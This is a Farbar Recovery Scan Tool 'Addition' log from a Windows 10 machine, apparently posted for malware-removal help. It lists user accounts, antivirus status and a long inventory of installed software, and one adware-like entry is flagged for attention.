Additional scan result of Farbar Recovery Scan Tool (x64) Version: 24-11-2019 Ran by SR (24-11-2019 19:51:29) Running from D:\Users\SR\Downloads Windows 10 Pro Version 1803 17134.345 (X64) (2018-06-02 13:24:39) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-3967059023-4107875624-2872843465-500 - Administrator - Disabled) => C:\Users\Administrator DefaultAccount (S-1-5-21-3967059023-4107875624-2872843465-503 - Limited - Disabled) Guest (S-1-5-21-3967059023-4107875624-2872843465-501 - Limited - Enabled) HomeGroupUser$ (S-1-5-21-3967059023-4107875624-2872843465-1006 - Limited - Enabled) SR (S-1-5-21-3967059023-4107875624-2872843465-1001 - Administrator - Enabled) => C:\Users\SR WDAGUtilityAccount (S-1-5-21-3967059023-4107875624-2872843465-504 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Accu-Sim 182 Skylane for FSX (HKLM-x32\...\Accu-Sim 182 Skylane for FSX) (Version: - ) Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\{55DBEDCF-367F-449E-B90C-43416D468ED1}) (Version: 18.9.15.1 - A2A Simulations Inc.) Hidden Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\Accu-Sim Bonanza 35 for Flight Simulator X 18.9.15.1) (Version: 19.5.24.0 - A2A Simulations Inc.) Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.1.335 - Adobe Systems Incorporated) Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.223 - Adobe) Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.0 - Adobe Systems Incorporated) Adobe Premiere (HKLM\...\{C1CB876C-A08E-4692-B525-42848BD154D7}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden Adobe Premiere Pro CC 2017 (HKLM-x32\...\PPRO_11_0_1) (Version: 11.0.1 - Adobe Systems Incorporated) Aerosoft's - Aerosoft Launcher (HKLM-x32\...\{EE11CFFC-898C-4875-8A63-8B732A9AD43B}) (Version: 1.1.0.1 - Aerosoft) Aerosoft's - Airbus A320-A321 - FSX STEAM Edition (HKLM-x32\...\Airbus A320-A321 - FSX STEAM Edition) (Version: 1.30 - Aerosoft) Aerosoft's - Diamond DA20-100 Katana 4X (HKLM-x32\...\{974BF461-4D2C-448A-B05B-502AEA41B7FB}) (Version: 1.04 - Aerosoft) aerosoft's - FlightSim Commander 9 (HKLM-x32\...\{F941AABE-E868-42D9-9F38-884250F7898A}) (Version: E: - aerosoft) aerosoft's - Professional Flight Planner X (HKLM-x32\...\{1A5D2729-4A3B-4CD5-85C8-4896FD44B78D}) (Version: 1.15 - aerosoft) AES Crypt (HKLM\...\{562885D3-41A7-4211-822E-B1B1510069E5}) (Version: 3.10 - Packetizer, Inc.) Altiverb 6 (HKLM-x32\...\Altiverb 6) (Version: - ) Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.) Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.) Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.) Application Verifier x64 External Package (HKLM\...\{B27BC1FC-8474-9E32-73C2-6F7CD58AD1E3}) (Version: 10.1.17763.132 - Microsoft) Hidden Application Verifier x64 External Package (HKLM\...\{F02CC6FE-37FC-3D47-F961-721D85BAF224}) (Version: 10.1.15063.674 - Microsoft) Hidden Arena 3.5.1 (HKLM-x32\...\Arena 3.5.1_is1) (Version: - ) ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach) AudioEase Altiverb VST RTAS v6.10 (HKLM-x32\...\AudioEase Altiverb VST RTAS_is1) (Version: - ) Autodesk Maya 2016 (HKLM\...\{3905B678-DC8D-4D5E-AA95-EA254D6C1239}) (Version: 16.0.1312.0 - Autodesk) Hidden Autodesk Maya 2016 (HKLM\...\Autodesk Maya 2016) (Version: 16.0.1312.0 - Autodesk) AutoHotkey 1.1.26.01 (HKLM\...\AutoHotkey) (Version: 1.1.26.01 - Lexikos) Banished (HKLM-x32\...\1207660783_is1) (Version: 2.3.0.7 - GOG.com) Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.72.1082 - AB Team, d.o.o.) Camtasia 9 (HKLM\...\{B8A4CB7E-7F5B-484F-A127-E4431000EDCE}) (Version: 9.0.4.1948 - TechSmith Corporation) Hidden Camtasia 9 (HKLM-x32\...\{5957dd25-bb4e-4234-9dc0-b3e10a70f636}) (Version: 9.0.4.1948 - TechSmith Corporation) Camtasia Studio 8 (HKLM-x32\...\{BFA04EE0-8240-4667-8D53-45496A901C33}) (Version: 8.1.2.1327 - TechSmith Corporation) Cheat Engine 6.7 (HKLM-x32\...\Cheat Engine 6.7_is1) (Version: - Cheat Engine) Cheat Engine 6.8.1 (HKLM-x32\...\Cheat Engine 6.8.1_is1) (Version: - Cheat Engine) ChessBase 14 (HKLM-x32\...\{EAC25C55-7C92-451B-94EE-D5BC3932A6A3}) (Version: 14.0.0.0 - ChessBase) Chessmaster Grandmaster Edition (HKLM-x32\...\{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft) Hidden Chessmaster Grandmaster Edition (HKLM-x32\...\InstallShield_{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft) ClickOnce Bootstrapper Package for Microsoft .NET Framework (HKLM-x32\...\{D256A5B9-68DA-4F6C-A447-A93E5639A46D}) (Version: 4.7.03083 - Microsoft Corporation) Hidden CloudNet (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION Deep Shredder 12 UCI (HKLM-x32\...\{14B6295D-6D03-4635-A17F-76AB10C74EF0}_is1) (Version: - Stefan Meyer-Kahlen) Desktop-Reminder 2 (HKLM-x32\...\{288487BA-D8C5-4C81-BD89-C7E49DD48E18}) (Version: 2.128 - Polenter - Software Solutions) Hidden Desktop-Reminder 2 (HKLM-x32\...\Desktop-Reminder 2) (Version: 2.128 - Polenter - Software Solutions) DiagnosticsHub_CollectionService (HKLM\...\{440C5592-4EA5-4772-B256-969D66068843}) (Version: 15.9.28016 - Microsoft Corporation) Hidden DiskProtect190001 version 19.01 (HKLM-x32\...\{6EE85A71-720C-4C73-8920-9BE5B5BF803D}_is1) (Version: 19.01 - ) DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 397.93 - NVIDIA Corporation) Hidden Dropbox (HKLM-x32\...\Dropbox) (Version: 85.4.155 - Dropbox, Inc.) Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.241.1 - Dropbox, Inc.) Hidden EaseUS MobiMover 4.5 (HKLM-x32\...\EaseUS MobiMover_is1) (Version: - EaseUS) E-muPatchMix DSP (HKLM-x32\...\EMU PatchMix DSP) (Version: - ) Entity Framework 6.2.0 Tools for Visual Studio 2017 (HKLM-x32\...\{B843915F-00A1-44B1-994C-1AE0A6400AE3}) (Version: 6.2.61807.0 - Microsoft Corporation) Hidden EPSON L130 Series Printer Uninstall (HKLM\...\EPSON L130 Series) (Version: - SEIKO EPSON Corporation) Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION) Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.2 - ) eReg (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden FIFA 19 (HKLM-x32\...\{3391E07D-8484-4124-817E-FCBDA859FD62}) (Version: 1.0.58.64628 - Electronic Arts) FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}) (Version: 16.0.4.403 - FileMaker, Inc.) Hidden FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}_FileMaker) (Version: 16.0.4.403 - FileMaker, Inc.) Finale (HKLM\...\{48133FCD-8D55-4D52-A668-D1A988FC00C4}) (Version: 25.0.0.6858 - MakeMusic) Flight One Software - GTN Series (HKLM-x32\...\F1T182T) (Version: 1.23 - Flight One Software) FLT 7.0v2 (HKLM-x32\...\FLT 7.0v2_is1) (Version: - The Foundry) FMRTE 17.3.1.17 (HKLM\...\{72A84F14-6742-48AD-9B14-E9C1BE155F7A}_is1) (Version: 17.3.1.17 - FMRTE) FMRTE 18.3.3.26 (HKLM\...\{DDBB4759-2DD1-4003-91B0-219DEF70DF13}_is1) (Version: 18.3.3.26 - FMRTE) Folder Size (64-bit) (HKLM\...\{F24FF688-7138-4CCF-A83F-71E9FB01170E}) (Version: 2.6 - Brio) Football Manager 2017 (HKLM\...\Football Manager 2017_is1) (Version: 1.0 - ) Football Manager 2017 Editor (HKLM\...\Football Manager 2017 Editor_is1) (Version: 1.0 - ) Football Manager 2018 (HKLM-x32\...\Football Manager 2018_is1) (Version: - ) Garmin Aviation Checklist Editor (HKLM-x32\...\{51B555C4-F02B-44A5-8710-8EFE8FCB0589}) (Version: 2.3.0.0 - Garmin Ltd or its subsidiaries) Garmin GTN Trainer (HKLM-x32\...\{FE8823C2-815A-493B-B3A4-DC2C20268AE8}) (Version: 6.21.0 - Garmin) Global Prime - MetaTrader 4 (HKLM-x32\...\Global Prime - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.) Google Earth Pro (HKLM\...\{70A0F34E-564B-4F93-ADD6-3BAEC6E44075}) (Version: 7.3.2.5776 - Google) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden Greenshot 1.2.10.6 (HKLM\...\Greenshot_is1) (Version: 1.2.10.6 - Greenshot) Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.) HD Tune Pro 5.50 (HKLM-x32\...\HD Tune Pro_is1) (Version: - EFD Software) icecap_collection_neutral (HKLM-x32\...\{A3B4D258-74E1-49D6-9A86-2DFEFEE48DEC}) (Version: 15.8.27906 - Microsoft Corporation) Hidden icecap_collection_x64 (HKLM\...\{E524832A-C567-499A-8872-0D79596E4DEE}) (Version: 15.8.27906 - Microsoft Corporation) Hidden icecap_collectionresources (HKLM-x32\...\{469961DF-482F-4213-ACD4-4AFD443F2A88}) (Version: 15.8.27924 - Microsoft Corporation) Hidden icecap_collectionresourcesx64 (HKLM-x32\...\{12246E9A-D1A6-4D96-8CEA-CCFD064B16E2}) (Version: 15.8.27924 - Microsoft Corporation) Hidden Icon Shepherd (HKLM\...\Icon Shepherd_is1) (Version: 19.10.2 - WinAbility Software Corp.) IDM Crack 6.25 build 25 (HKLM-x32\...\IDM Crack 6.25 build 25) (Version: 5.40 - Crackingpatching.com Team) InputMapper (HKLM-x32\...\{026D2025-A7FA-4F5C-AF8C-A6F7A9B917FC}) (Version: 1.6.10.19991 - DSDCS) InputMapper HidGuardian (HKLM-x32\...\{3753F0EF-7F58-4BBA-B4EA-9E1B83C13B97}) (Version: 1.0.6320.17641 - DSDCS) Intellisense Lang Pack Mobile Extension SDK 10.0.15063.0 (HKLM-x32\...\{87A8879A-3189-4E81-8D1A-0467301C5049}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden IntelliTraceProfilerProxy (HKLM-x32\...\{ACBAA378-519A-441D-9349-C0AAD8DEAD04}) (Version: 15.0.17289.01 - Microsoft Corporation) Hidden iTools 3 (HKLM-x32\...\ThinkSky) (Version: - Shenzhen Thinksky Technology Co., Ltd.) iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.) iZotope RX 5 (HKLM-x32\...\iZotope RX 5_is1) (Version: 5.01 - iZotope, Inc.) Java 8 Update 231 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180231F0}) (Version: 8.0.2310.11 - Oracle Corporation) Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Version: 8.0.600.27 - Oracle Corporation) Java SE Development Kit 8 Update 60 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180600}) (Version: 8.0.600.27 - Oracle Corporation) Kits Configuration Installer (HKLM-x32\...\{971E24EB-1096-64A5-10C0-7FD2D3774669}) (Version: 10.1.15063.674 - Microsoft) Hidden Landing Rate Monitor (HKLM-x32\...\{B946315D-F716-492B-B914-718BC9A5D6D4}_is1) (Version: 4.0.0 - Bobby Allen) Lexikon Sonate version 5.0 (HKLM-x32\...\Lexikon Sonate_is1) (Version: 5.0 - ) LLH5X (HKLM-x32\...\LLH5X) (Version: - ) LLH7X (HKLM-x32\...\LLH7X) (Version: - ) LLH8X (HKLM-x32\...\LLH8X) (Version: - ) LLH-Heli (HKLM-x32\...\LLH-Heli) (Version: - ) Logitech Options (HKLM\...\LogiOptions) (Version: 6.90.131 - Logitech) Logitech SetPoint 6.69 (HKLM\...\sp6) (Version: 6.69.123 - Logitech) loopMIDI (HKLM-x32\...\{55c0d955-4cee-452c-b393-d4c020a967d7}) (Version: 1.0.13.24 - Tobias Erichsen) loopMIDI (HKLM-x32\...\{9E69C6CD-820A-44A9-9A0A-B7A56AD62A1E}) (Version: 1.0.13.24 - Tobias Erichsen) Hidden loopMIDIBlockLegacy (HKLM-x32\...\{AEAF7978-3204-451D-8593-BC53EBDDA31D}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden Macro Recorder 5.7.1 (HKLM-x32\...\Macro Recorder_is1) (Version: 5.7.1 - Jitbit Software) Malwarebytes version 3.8.3.2965 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.8.3.2965 - Malwarebytes) Mari 2.5v2 (HKLM\...\Mari 2.5v2_is1) (Version: - The Foundry) Max 7 (64-bit) (HKLM\...\{AB97A2FF-BA6F-4B15-8032-FF9A331AFF77}) (Version: 7.0.3 - Cycling '74) MaxScore (HKLM-x32\...\MaxScore 0.8.41) (Version: 0.8.41 - maxscore) MayaBonusTools (HKLM\...\{367B88BA-C90B-A1D3-81BA-7C5407698472}) (Version: 17.0.1 - Autodesk, Inc.) Melodyne 3.1 (HKLM-x32\...\{9D623E1A-30E1-4E55-BD80-5C1359DB120B}) (Version: 3.1.0200 - Celemony Software GmbH) Hidden Melodyne 3.1 (HKLM-x32\...\{A1F143D1-1F0D-44FB-A44B-71D4367D16DE}) (Version: 3.1.0200 - Celemony Software GmbH) mental ray renderer for Autodesk Maya 2016 (HKLM\...\{59AC9438-6EE3-4B22-860F-525308329228}) (Version: 16.0.1312.0 - mental ray) MetaStock 11.0 (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\MetaStock 11.0) (Version: - ) Microsoft .NET Core SDK 2.1.509 (x64) (HKLM-x32\...\{305c8a42-62c1-4b59-b53f-09a9f066fd44}) (Version: 2.1.509 - Microsoft Corporation) Microsoft Flight Simulator SimConnect Client v10.0.60905.0 (HKLM-x32\...\{D1AC9B0B-2727-4811-91DC-1FC3C4E47A9B}) (Version: 10.0.60905.0 - Microsoft Corporation) Microsoft Flight Simulator SimConnect Client v10.0.61242.0 (HKLM-x32\...\{85DF6786-66AA-42EE-8616-AE456B07BD99}) (Version: 10.0.61242.0 - Microsoft Corporation) Microsoft Flight Simulator SimConnect Client v10.0.61259.0 (HKLM-x32\...\{D61CA184-3F6D-4A50-B2CC-7A18447D6A8D}) (Version: 10.0.61259.0 - Microsoft Corporation) Microsoft Flight Simulator X Steam Edition (HKLM-x32\...\Microsoft Flight Simulator X Steam Edition_is1) (Version: - ) Microsoft Office Professional Plus 2016 - el-gr (HKLM\...\ProplusRetail - el-gr) (Version: 16.0.12228.20250 - Microsoft Corporation) Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProplusRetail - en-us) (Version: 16.0.12228.20250 - Microsoft Corporation) Microsoft OneDrive (HKU\.DEFAULT\...\OneDriveSetup.exe) (Version: 18.151.0729.0013 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\OneDriveSetup.exe) (Version: 19.202.1013.0006 - Microsoft Corporation) Microsoft SQL Server 2012 Express LocalDB (HKLM\...\{E75776B2-EAE5-42F9-A800-0A10763DEDF0}) (Version: 11.0.2318.0 - Microsoft Corporation) Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM\...\{98DD6908-C582-452A-954D-E79E6DF0310A}) (Version: 15.0.600.33 - Microsoft Corporation) Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM-x32\...\{640EECB8-1962-4D23-ACB2-310107EC7ED9}) (Version: 15.0.600.33 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{307a22b8-8353-4c5e-b67b-2404c5734558}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27033 (HKLM-x32\...\{cc3a7c63-31fb-4129-9024-63ebefd86a95}) (Version: 14.16.27033.0 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27033 (HKLM-x32\...\{624ba875-fdfc-4efa-9c66-b170dfebc3ec}) (Version: 14.16.27033.0 - Microsoft Corporation) Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.18.1104.625 - Microsoft Corporation) MMFonts (HKLM-x32\...\{1DD5D3E6-8DF5-4657-8825-713C499CDCC0}) (Version: 1.1.1.1 - MakeMusic, Inc.) Mozilla Firefox 61.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 61.0.2 (x86 en-US)) (Version: 61.0.2 - Mozilla) Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 64.0.2 - Mozilla) Mp3tag v2.84a (HKLM-x32\...\Mp3tag) (Version: 2.84a - Florian Heidenreich) MSI Development Tools (HKLM-x32\...\{577FB968-1AAC-A315-93D6-419725A69F36}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden MSI Development Tools (HKLM-x32\...\{6C961B30-A670-8A05-3BFE-3947E84DD4E4}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) Native Instruments Kontakt 5 (HKLM-x32\...\Native Instruments Kontakt 5) (Version: 5.7.3.37 - Native Instruments) Network Addon Mod (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Network Addon Mod) (Version: 36 - The NAM Team) Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.8 - Notepad++ Team) NovaGOPlayer 7.3.3 (HKLM-x32\...\89399A59-11C3-4EBC-A59E-FBD13021BC07_is1) (Version: 7.3.3 - Forthnet Media SA) NVAPI Monitor plugin for NvContainer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvContainer.NvapiMonitor) (Version: 1.15 - NVIDIA Corporation) Hidden NVIDIA 3D Vision Controller Driver 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation) NVIDIA 3D Vision Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 397.93 - NVIDIA Corporation) NVIDIA GeForce Experience 3.19.0.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.19.0.94 - NVIDIA Corporation) NVIDIA Graphics Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 397.93 - NVIDIA Corporation) NVIDIA HD Audio Driver 1.3.37.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.37.4 - NVIDIA Corporation) NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation) OANDA - MetaTrader (HKLM-x32\...\OANDA - MetaTrader) (Version: 4.00 - MetaQuotes Software Corp.) OANDA Desktop (HKLM-x32\...\{1DAF3BB8-E27F-4698-9D7C-270985AA3BCE}) (Version: 2.6.3 - OANDA) Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0408-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden PACE License Support Win64 (HKLM\...\{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.) Hidden PACE License Support Win64 (HKLM-x32\...\InstallShield_{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.) PCM Native Reverb VST Plug-in (HKLM-x32\...\{B4691C58-2A6A-4AFA-960E-AEB767639E44}) (Version: 1.0.0 - Lexicon) Hidden PCM Native Reverb VST Plug-in (HKLM-x32\...\PCM Native Reverb VST Plug-in) (Version: - Lexicon) PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.5.2 - pdfforge GmbH) PMDG 737 8900 NGX Base Package FSX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.10.6436 - PMDG Simulations, LLC.) PureSync (HKLM-x32\...\{728DB5F9-AFAC-4027-B0A0-4194D89328E4}) (Version: 4.7.3 - Jumping Bytes) qBittorrent 4.1.6 (HKLM-x32\...\qBittorrent) (Version: 4.1.6 - The qBittorrent project) Quick Search 5.28.1.101 (HKLM-x32\...\Quick Search) (Version: 5.28.1.101 - Glarysoft Ltd) QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.) RapidMiner Studio (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\RapidMiner Studio) (Version: 7.6.1.0 - RapidMiner) RealAir Turbine Duke (HKLM\...\Turbine Duke07.1.10.35) (Version: 07.1.10.35 - RealAir Simulations) Revolution DB Master 19 Beta 1 (HKLM-x32\...\Revolution DB Master 19_is1) (Version: - FIFA MASTER) REX 4 - Weather Architect (HKLM-x32\...\{1D59EFDF-0A58-4FF9-A468-A1190F1FAFEB}) (Version: 4.0.2015.0717 - REX Game Studios, LLC.) rtpMIDIBlockLegacy (HKLM-x32\...\{FD937297-84C3-41A5-B5DF-1FAEEE669D68}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden SafeZone Stable 3.55.2393.609 (HKLM-x32\...\SafeZone 3.55.2393.609) (Version: 3.55.2393.609 - Avast Software) Hidden Sandboxie 5.30 (64-bit) (HKLM\...\Sandboxie) (Version: 5.30 - Sandboxie Holdings, LLC) Scid vs PC 4.18 (HKLM-x32\...\Scid vs PC_is1) (Version: 4.18 - Steven Atkinson) Screen Protractor (HKLM-x32\...\Screen Protractor) (Version: 4.0 - Iconico) SDK ARM Additions (HKLM-x32\...\{0B5D6FB7-05A5-271B-5B99-82384219A471}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden SDK ARM Redistributables (HKLM-x32\...\{4A5F6E94-7967-A333-8231-CA9AF35E03BD}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden SimCity (HKLM-x32\...\SimCity_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter) SimCity 4 Deluxe Edition (HKLM-x32\...\GOGPACKSC4_is1) (Version: 2.0.0.8 - GOG.com) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) SumatraPDF (HKLM\...\SumatraPDF) (Version: 3.1.2 - 